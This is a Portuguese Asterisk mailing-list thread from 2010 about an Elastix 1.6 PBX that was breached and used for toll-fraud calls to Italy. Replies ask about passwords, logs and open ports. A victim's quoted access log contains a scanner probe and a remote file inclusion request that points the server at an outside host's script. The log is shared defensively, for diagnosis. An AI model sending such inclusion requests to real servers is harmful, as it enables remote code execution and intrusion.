[mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > Sim no Elastix 1.6 > > ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com > IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais > estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o > que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas > durante a madrugada os caras arrebentaram de ligar. > > > > > > > > > > 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 > > > > > > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > -- > From: niel...@freesolutions.com.br > Date: Mon, 22 Nov 2010 13:27:16 -0300 > > To: asteriskbrasil@listas.asteriskbrasil.org > Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > > Opa, foi no seu ELASTIX 1.6? > > Qual a posição que se encontra seu servidor voip na sua rede ? > > Em 22 de novembro de 2010 13:20, Gleidison Sampaio < > gleidison.samp...@hotmail.com> escreveu: > > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > -- > From: sidnei...@ig.com.br > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 14:00:10 -0200 > Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Não, pois estão todas as linhas comentadas (é só um exemplo). > > *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: > asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison > Sampaio > *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 > *Para:* Asterisk Lista > *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 > > Boa tarde Lista! > > hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, > e gostaria de saber se isso da permissao a algum acesso no meu servidor > > /etc/asterisk/users.conf > > ;[6000] > ;fullname = Joe User > ;email = j...@foo.bar > ;secret = > ;zapchan = 1 > ;hasvoicemail = yes > ;vmsecret = > ;hassip = yes > ;hasiax = no > ;hash323 = no > ;hasmanager = no > ;callwaiting = no > ;context = international > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo)
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:0100393396976261SIP/TRUNK SIP/TRUNKANSWERED1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User;email = j...@foo.bar;secret = ;zapchan = 1;hasvoicemail = yes;vmsecret = ;hassip = yes;hasiax = no;hash323 = no;hasmanager = no ;callwaiting = no;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Quais portas voce tem aberto para fora que sao direcionadas para esse asterisk? Em 22 de novembro de 2010 12:20, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > ---------- > From: sidnei...@ig.com.br > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 14:00:10 -0200 > Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > > Não, pois estão todas as linhas comentadas (é só um exemplo). > > > > *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: > asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison > Sampaio > *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 > *Para:* Asterisk Lista > *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 > > > > Boa tarde Lista! > > > > hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, > e gostaria de saber se isso da permissao a algum acesso no meu servidor > > > > /etc/asterisk/users.conf > > > > ;[6000] > > ;fullname = Joe User > > ;email = j...@foo.bar > > ;secret = > > ;zapchan = 1 > > ;hasvoicemail = yes > > ;vmsecret = > > ;hassip = yes > > ;hasiax = no > > ;hash323 = no > > ;hasmanager = no > > ;callwaiting = no > > ;context = international > > > > > > > > > > Att; > > > > *Gleidison C. Sampaio* > > > > > > ___ KHOMP: qualidade em placas > de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de > recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito > Conhe�a a linha completa de produtos KHOMP em > www.khomp.com.br___ Temos tudo > para seu projeto > VoIP com Asterisk! Descontos especiais para assinantes da > AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! > Acesse agora > www.voipmania.com.br__ Lista de > discuss�es > AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil__ > Para remover seu email desta > lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio < gleidison.samp...@hotmail.com> escreveu: > Sidinei, > > Obrigado pela Resposta, > > cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes > para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. > alguem poderia me ajudar a bloquear isso. > > /var/log/httpd/access_log > > 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs > HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner" > 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET > /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? > HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > > > > Att; > > *Gleidison C. Sampaio* > > > > > > > ---------- > From: sidnei...@ig.com.br > To: asteriskbrasil@listas.asteriskbrasil.org > Date: Mon, 22 Nov 2010 14:00:10 -0200 > Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 > > Não, pois estão todas as linhas comentadas (é só um exemplo). > > > > *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: > asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison > Sampaio > *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 > *Para:* Asterisk Lista > *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 > > > > Boa tarde Lista! > > > > hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, > e gostaria de saber se isso da permissao a algum acesso no meu servidor > > > > /etc/asterisk/users.conf > > > > ;[6000] > > ;fullname = Joe User > > ;email = j...@foo.bar > > ;secret = > > ;zapchan = 1 > > ;hasvoicemail = yes > > ;vmsecret = > > ;hassip = yes > > ;hasiax = no > > ;hash323 = no > > ;hasmanager = no > > ;callwaiting = no > > ;context = international > > > > > > > > > > Att; > > > > *Gleidison C. Sampaio* > > > > > > ___ KHOMP: qualidade em placas > de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de > recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito > Conhe�a a linha completa de produtos KHOMP em > www.khomp.com.br___ Temos tudo > para seu projeto > VoIP com Asterisk! Descontos especiais para assinantes da > AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! > Acesse agora > www.voipmania.com.br__ Lista de > discuss�es > AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil__ > Para remover seu email desta > lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > > ___ > KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. > - Hardware com alta disponibilidade de recursos e qualidade KHOMP > - Suporte técnico local qualificado e gratuito > Conheça a linha completa de produtos KHOMP em www.khomp.com.br > ___ > Temos tudo para seu projeto VoIP com Asterisk! > Descontos especiais para assinantes da AsteriskBrasil.org. > Registre-se e receba um cupom exclusivo de desconto! > Acesse agora www.voipmania.com.br > __ > Lista de discussões AsteriskBrasil.org > AsteriskBrasil@listas.asteriskbrasil.org > http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil > __ > Para remover seu email desta lista, basta enviar um email em branco para > asteriskbrasil-unsubscr...@listas.asteriskbrasil.org > -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo) ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk!
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] "GET /user/soapCaller.bs HTTP/1.1" 302 305 "-" "Morfeus Fucking Scanner"72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] "GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1" 302 354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000];fullname = Joe User;email = j...@foo.bar;secret = ;zapchan = 1;hasvoicemail = yes;vmsecret = ;hassip = yes;hasiax = no;hash323 = no;hasmanager = no;callwaiting = no;context = internationalAtt; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito Conhe�a a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discuss�es AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org